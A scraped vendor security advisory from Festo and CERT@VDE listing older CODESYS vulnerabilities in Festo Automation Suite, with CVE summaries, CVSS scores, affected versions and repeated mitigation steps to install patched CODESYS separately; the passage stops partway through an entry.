Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://certvde.com/en/advisories/VDE-2025-108 Relevant CWE: CWE-755 Improper Handling of Exceptional Conditions Metrics CVSS Version Base Score Base Severity Vector String 3.1 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H CVE-2021-34593 In CODESYS V2 Runtime Toolkit 32 Bit full and PLCWinNT prior to versions V2.4.7.56 unauthenticated crafted invalid requests may result in several denial-of-service conditions. Running PLC programs may be stopped, memory may be leaked, or further communication clients may be blocked from accessing the PLC. View CVE Details Affected Products CODESYS in Festo Automation Suite Vendor: FESTO, CODESYS Product Version: FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/* Product Status: known_affected Remediations Mitigation FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk: Mitigation Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo. Mitigation The following product versions have been fixed: Mitigation CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://certvde.com/en/advisories/VDE-2025-108 Relevant CWE: CWE-75 Failure to Sanitize Special Elements into a Different Plane (Special Element Injection) Metrics CVSS Version Base Score Base Severity Vector String 3.1 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H CVE-2021-34595 A crafted request with invalid offsets may cause an out-of-bounds read or write access in CODESYS V2 Runtime Toolkit 32 Bit full and PLCWinNT prior to versions V2.4.7.56, resulting in a denial-of-service condition or local memory overwrite. View CVE Details Affected Products CODESYS in Festo Automation Suite Vendor: FESTO, CODESYS Product Version: FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/* Product Status: known_affected Remediations Mitigation FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk: Mitigation Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo. Mitigation The following product versions have been fixed: Mitigation CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://certvde.com/en/advisories/VDE-2025-108 Relevant CWE: CWE-823 Use of Out-of-range Pointer Offset Metrics CVSS Version Base Score Base Severity Vector String 3.1 8.1 HIGH CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H CVE-2021-34596 A crafted request may cause a read access to an uninitialized pointer in CODESYS V2 Runtime Toolkit 32 Bit full and PLCWinNT prior to versions V2.4.7.56, resulting in a denial-of-service condition. View CVE Details Affected Products CODESYS in Festo Automation Suite Vendor: FESTO, CODESYS Product Version: FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/* Product Status: known_affected Remediations Mitigation FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk: Mitigation Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo. Mitigation The following product versions have been fixed: Mitigation CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://certvde.com/en/advisories/VDE-2025-108 Relevant CWE: CWE-82 Improper Neutralization of Script in Attributes of IMG Tags in a Web Page Metrics CVSS Version Base Score Base Severity Vector String 3.1 6.5 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H CVE-2021-36763 In CODESYS V3 web server before 3.5.17.10, files or directories are accessible to External Parties. View CVE Details Affected Products CODESYS in Festo Automation Suite Vendor: FESTO, CODESYS Product Version: FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/* Product Status: known_affected Remediations Mitigation FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk: Mitigation Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo. Mitigation The following product versions have been fixed: Mitigation CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://certvde.com/en/advisories/VDE-2025-108 Relevant CWE: CWE-552 Files or Directories Accessible to External Parties Metrics CVSS Version Base Score Base Severity Vector String 3.1 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N CVE-2021-36764 In CODESYS Gateway V3 before 3.5.17.10, there is a NULL Pointer Dereference. Crafted communication requests may cause a Null pointer dereference in the affected CODESYS products and may result in a denial-of-service condition. View CVE Details Affected Products CODESYS in Festo Automation Suite Vendor: FESTO, CODESYS Product Version: FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/* Product Status: known_affected Remediations Mitigation FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk: Mitigation Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo. Mitigation The following product versions have been fixed: Mitigation CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://certvde.com/en/advisories/VDE-2025-108 Relevant CWE: CWE-476 NULL Pointer Dereference Metrics CVSS Version Base Score Base Severity Vector String 3.1 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H CVE-2021-36765 In CODESYS EtherNetIP before 4.1.0.0, specific EtherNet/IP requests may cause a null pointer dereference in the downloaded vulnerable EtherNet/IP stack that is executed by the CODESYS Control runtime system. View CVE Details Affected Products CODESYS in Festo Automation Suite Vendor: FESTO, CODESYS Product Version: FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/* Product Status: known_affected Remediations Mitigation FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk: Mitigation Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo. Mitigation The following product versions have been fixed: Mitigation CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://certvde.com/en/advisories/VDE-2025-108 Relevant CWE: CWE-476 NULL Pointer Dereference Metrics CVSS Version Base Score Base Severity Vector String 3.0 7.5 HIGH CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N CVE-2022-1965 Multiple products of CODESYS implement a improper error handling. A low privilege remote attacker may craft a request, which is not properly processed by the error handling. In consequence, the file referenced by the request could be deleted. User interaction is not required. View CVE Details Affected Products CODESYS in Festo Automation Suite Vendor: FESTO, CODESYS Product Version: FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/* Product Status: known_affected Remediations Mitigation FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk: Mitigation Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo. Mitigation The following product versions have been fixed: Mitigation CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://certvde.com/en/advisories/VDE-2025-108 Relevant CWE: CWE-755 Improper Handling of Exceptional Conditions Metrics CVSS Version Base Score Base Severity Vector String 3.1 8.1 HIGH CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H CVE-2022-1989 All CODESYS Visualization versions before V4.2.0.0 generate a login dialog vulnerable to information exposure allowing a remote, unauthenticated attacker to enumerate valid users. View CVE Details Affected Products CODESYS in Festo Automation Suite Vendor: FESTO, CODESYS Product Version: FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/* Product Status: known_affected Remediations Mitigation FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk: Mitigation Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo. Mitigation The following product versions have been fixed: Mitigation CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://certvde.com/en/advisories/VDE-2025-108 Relevant CWE: CWE-20 Improper Input Validation Metrics CVSS Version Base Score Base Severity Vector String 3.1 5.3 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N CVE-2022-22508 Improper Input Validation vulnerability in multiple CODESYS V3 products allows an authenticated remote attacker to block consecutive logins of a specific type. View CVE Details Affected Products CODESYS in Festo Automation Suite Vendor: FESTO, CODESYS Product Version: FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/* Product Status: known_affected Remediations Mitigation FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk: Mitigation Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo. Mitigation The following product versions have been fixed: Mitigation CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://certvde.com/en/advisories/VDE-2025-108 Relevant CWE: CWE-20 Improper Input Validation Metrics CVSS Version Base Score Base Severity Vector String 3.1 4.3 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L CVE-2022-22513 An authenticated remote attacker can cause a null pointer dereference in the CmpSettings component of the affected CODESYS products which leads to a crash. View CVE Details Affected Products CODESYS in Festo Automation Suite Vendor: FESTO, CODESYS Product Version: FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/* Product Status: known_affected Remediations Mitigation FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk: Mitigation Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo. Mitigation The following product versions have been fixed: Mitigation CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://certvde.com/en/advisories/VDE-2025-108 Relevant CWE: CWE-476 NULL Pointer Dereference Metrics CVSS Version Base Score Base Severity Vector String 3.0 6.5 MEDIUM CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H CVE-2022-22514 An authenticated, remote attacker can gain access to a dereferenced pointer contained in a request. The accesses can subsequently lead to local overwriting of memory in the CmpTraceMgr, whereby the attacker can neither gain the values read internally nor control the values to be written. If invalid memory is accessed, this results in a crash. View CVE Details Affected Products CODESYS in Festo Automation Suite Vendor: FESTO, CODESYS Product Version: FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/* Product Status: known_affected Remediations Mitigation FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk: Mitigation Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo. Mitigation The following product versions have been fixed: Mitigation CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://certvde.com/en/advisories/VDE-2025-108 Relevant CWE: CWE-822 Untrusted Pointer Dereference Metrics CVSS Version Base Score Base Severity Vector String 3.1 7.1 HIGH CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:H CVE-2022-22515 A remote, authenticated attacker could utilize the control program of the CODESYS Control runtime system to use the vulnerability in order to read and modify the configuration file(s) of the affected products. View CVE Details Affected Products CODESYS in Festo Automation Suite Vendor: FESTO, CODESYS Product Version: FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/* Product Status: known_affected Remediations Mitigation FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk: Mitigation Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo. Mitigation The following product versions have been fixed: Mitigation CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://certvde.com/en/advisories/VDE-2025-108 Relevant CWE: CWE-668 Exposure of Resource to Wrong Sphere Metrics CVSS Version Base Score Base Severity Vector String 3.1 8.1 HIGH CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N CVE-2022-22516 The SysDrv3S driver in the CODESYS Control runtime system on Microsoft Windows allows any system user to read and write within restricted memory space. View CVE Details Affected Products CODESYS in Festo Automation Suite Vendor: FESTO, CODESYS Product Version: FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/* Product Status: known_affected Remediations Mitigation FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk: Mitigation Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo. Mitigation The following product versions have been fixed: Mitigation CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://certvde.com/en/advisories/VDE-2025-108 Relevant CWE: CWE-732 Incorrect Permission Assignment for Critical Resource Metrics CVSS Version Base Score Base Severity Vector String 3.1 7.8 HIGH CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H CVE-2022-22517 An unauthenticated, remote attacker can disrupt existing communication channels between CODESYS products by guessing a valid channel ID and injecting packets. This results in the communication channel to be closed. View CVE Details Affected Products CODESYS in Festo Automation Suite Vendor: FESTO, CODESYS Product Version: FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System 